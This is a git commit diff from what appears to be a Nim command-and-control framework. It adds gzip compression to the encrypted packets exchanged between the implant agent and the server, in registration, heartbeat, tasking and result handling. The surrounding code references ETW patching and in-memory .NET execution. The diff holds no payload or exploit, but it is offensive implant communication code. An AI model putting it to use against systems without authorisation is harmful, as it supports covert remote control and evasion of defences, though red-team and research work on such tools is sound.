admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implemented compression of the network packet bodies.

Browse Source
This commit is contained in:
Jakob Friedl
2025-09-13 15:18:46 +02:00
parent b7b9114258
commit c6bbef8520
7 changed files with 48 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
conquest.nimble
View File

@@ -28,4 +28,5 @@ requires "tiny_sqlite >= 0.2.0"
requires "prologue >= 0.6.6" requires "prologue >= 0.6.6"
requires "winim >= 3.9.4" requires "winim >= 3.9.4"
requires "ptr_math >= 0.3.0" requires "ptr_math >= 0.3.0"
requires "imguin >= 1.92.2.0" requires "imguin >= 1.92.2.0"
requires "zippy >= 0.10.16"

1
src/agent/core/clr.nim
View File

@@ -34,7 +34,6 @@ proc etwPatch(pThreadCtx: PCONTEXT) =
Arguments: Arguments:
- assemblyBytes: Serialized .NET assembly - assemblyBytes: Serialized .NET assembly
- arguments: seq[string] of arguments that should be passed to the function - arguments: seq[string] of arguments that should be passed to the function
Returns: CLR Version and assembly output
]# ]#
proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[string] = @[]): tuple[assembly, output: string] = proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[string] = @[]): tuple[assembly, output: string] =

8
src/agent/protocol/heartbeat.nim
View File

@@ -1,5 +1,4 @@
import times import times, zippy
import ../../common/[types, serialize, sequence, utils, crypto] import ../../common/[types, serialize, sequence, utils, crypto]
proc createHeartbeat*(ctx: AgentCtx): Heartbeat = proc createHeartbeat*(ctx: AgentCtx): Heartbeat =
@@ -31,8 +30,11 @@ proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] =
let body = packer.pack() let body = packer.pack()
packer.reset() packer.reset()
# Compress payload body
let compressedPayload = compress(body, BestCompression, dfGzip)
# Encrypt check-in / heartbeat request body # Encrypt check-in / heartbeat request body
let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr) let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, compressedPayload, request.header.seqNr)
# Set authentication tag (GMAC) # Set authentication tag (GMAC)
request.header.gmac = gmac request.header.gmac = gmac

7
src/agent/protocol/registration.nim
View File

@@ -1,4 +1,4 @@
import winim, os, net, strformat, strutils, registry, sugar import winim, os, net, strformat, strutils, registry, zippy
import ../../common/[types, serialize, sequence, crypto, utils] import ../../common/[types, serialize, sequence, crypto, utils]
@@ -241,8 +241,11 @@ proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData):
let metadata = packer.pack() let metadata = packer.pack()
packer.reset() packer.reset()
# Compress payload body
let compressedPayload = compress(metadata, BestCompression, dfGzip)
# Encrypt metadata # Encrypt metadata
let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr) let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, compressedPayload, data.header.seqNr)
# Set authentication tag (GMAC) # Set authentication tag (GMAC)
data.header.gmac = gmac data.header.gmac = gmac

7
src/agent/protocol/result.nim
View File

@@ -1,4 +1,4 @@
import times, sugar import times, zippy
import ../../common/[types, serialize, sequence, crypto, utils] import ../../common/[types, serialize, sequence, crypto, utils]
proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult = proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult =
@@ -44,8 +44,11 @@ proc serializeTaskResult*(ctx: AgentCtx, taskResult: var TaskResult): seq[byte]
let body = packer.pack() let body = packer.pack()
packer.reset() packer.reset()
# Compress payload
let compressedPayload = compress(body, BestCompression, dfGzip)
# Encrypt result body # Encrypt result body
let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, body, taskResult.header.seqNr) let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, compressedPayload, taskResult.header.seqNr)
# Set authentication tag (GMAC) # Set authentication tag (GMAC)
taskResult.header.gmac = gmac taskResult.header.gmac = gmac

11
src/agent/protocol/task.nim
View File

@@ -1,4 +1,4 @@
import strutils, tables, json, strformat, sugar import strutils, tables, json, strformat, zippy
import ./result import ./result
import ../../modules/manager import ../../modules/manager
@@ -20,11 +20,14 @@ proc deserializeTask*(ctx: AgentCtx, bytes: seq[byte]): Task =
validatePacket(header, cast[uint8](MSG_TASK)) validatePacket(header, cast[uint8](MSG_TASK))
# Decrypt payload # Decrypt payload
let payload = unpacker.getBytes(int(header.size)) let compressedPayload = unpacker.getBytes(int(header.size))
let decData= validateDecryption(ctx.sessionKey, header.iv, payload, header.seqNr, header) let decData = validateDecryption(ctx.sessionKey, header.iv, compressedPayload, header.seqNr, header)
# Decompress payload
let payload = uncompress(decData, dfGzip)
# Deserialize decrypted data # Deserialize decrypted data
unpacker = Unpacker.init(Bytes.toString(decData)) unpacker = Unpacker.init(Bytes.toString(payload))
let let
taskId = unpacker.getUint32() taskId = unpacker.getUint32()

36
src/server/protocol/packer.nim
View File

@@ -1,4 +1,4 @@
import strutils, streams, times, tables import strutils, streams, times, tables, zippy
import ../../common/[types, utils, serialize, sequence, crypto] import ../../common/[types, utils, serialize, sequence, crypto]
proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
@@ -19,14 +19,17 @@ proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
let payload = packer.pack() let payload = packer.pack()
packer.reset() packer.reset()
# Compress payload body
let compressedPayload = compress(payload, BestCompression, dfGzip)
# Encrypt payload body # Encrypt payload body
let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, payload, task.header.seqNr) let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, compressedPayload, task.header.seqNr)
# Set authentication tag (GMAC) # Set authentication tag (GMAC)
task.header.gmac = gmac task.header.gmac = gmac
# Serialize header # Serialize header
let header = packer.serializeHeader(task.header, uint32(payload.len)) let header = packer.serializeHeader(task.header, uint32(encData.len))
return header & encData return header & encData
@@ -40,11 +43,14 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult =
validatePacket(header, cast[uint8](MSG_RESULT)) validatePacket(header, cast[uint8](MSG_RESULT))
# Decrypt payload # Decrypt payload
let payload = unpacker.getBytes(int(header.size)) let compressedPayload = unpacker.getBytes(int(header.size))
let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header)
# Decompress payload
let payload = uncompress(decData, dfGzip)
# Deserialize decrypted data # Deserialize decrypted data
unpacker = Unpacker.init(Bytes.toString(decData)) unpacker = Unpacker.init(Bytes.toString(payload))
let let
taskId = unpacker.getUint32() taskId = unpacker.getUint32()
@@ -82,11 +88,14 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
let sessionKey = deriveSessionKey(cq.keyPair, agentPublicKey) let sessionKey = deriveSessionKey(cq.keyPair, agentPublicKey)
# Decrypt payload # Decrypt payload
let payload = unpacker.getBytes(int(header.size)) let compressedPayload = unpacker.getBytes(int(header.size))
let decData= validateDecryption(sessionKey, header.iv, payload, header.seqNr, header) let decData = validateDecryption(sessionKey, header.iv, compressedPayload, header.seqNr, header)
# Decompress payload
let payload = uncompress(decData, dfGzip)
# Deserialize decrypted data # Deserialize decrypted data
unpacker = Unpacker.init(Bytes.toString(decData)) unpacker = Unpacker.init(Bytes.toString(payload))
let let
listenerId = unpacker.getUint32() listenerId = unpacker.getUint32()
@@ -128,11 +137,14 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat =
validatePacket(header, cast[uint8](MSG_HEARTBEAT)) validatePacket(header, cast[uint8](MSG_HEARTBEAT))
# Decrypt payload # Decrypt payload
let payload = unpacker.getBytes(int(header.size)) let compressedPayload = unpacker.getBytes(int(header.size))
let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header)
# Decompress payload
let payload = uncompress(decData, dfGzip)
# Deserialize decrypted data # Deserialize decrypted data
unpacker = Unpacker.init(Bytes.toString(decData)) unpacker = Unpacker.init(Bytes.toString(payload))
return Heartbeat( return Heartbeat(
header: header, header: header,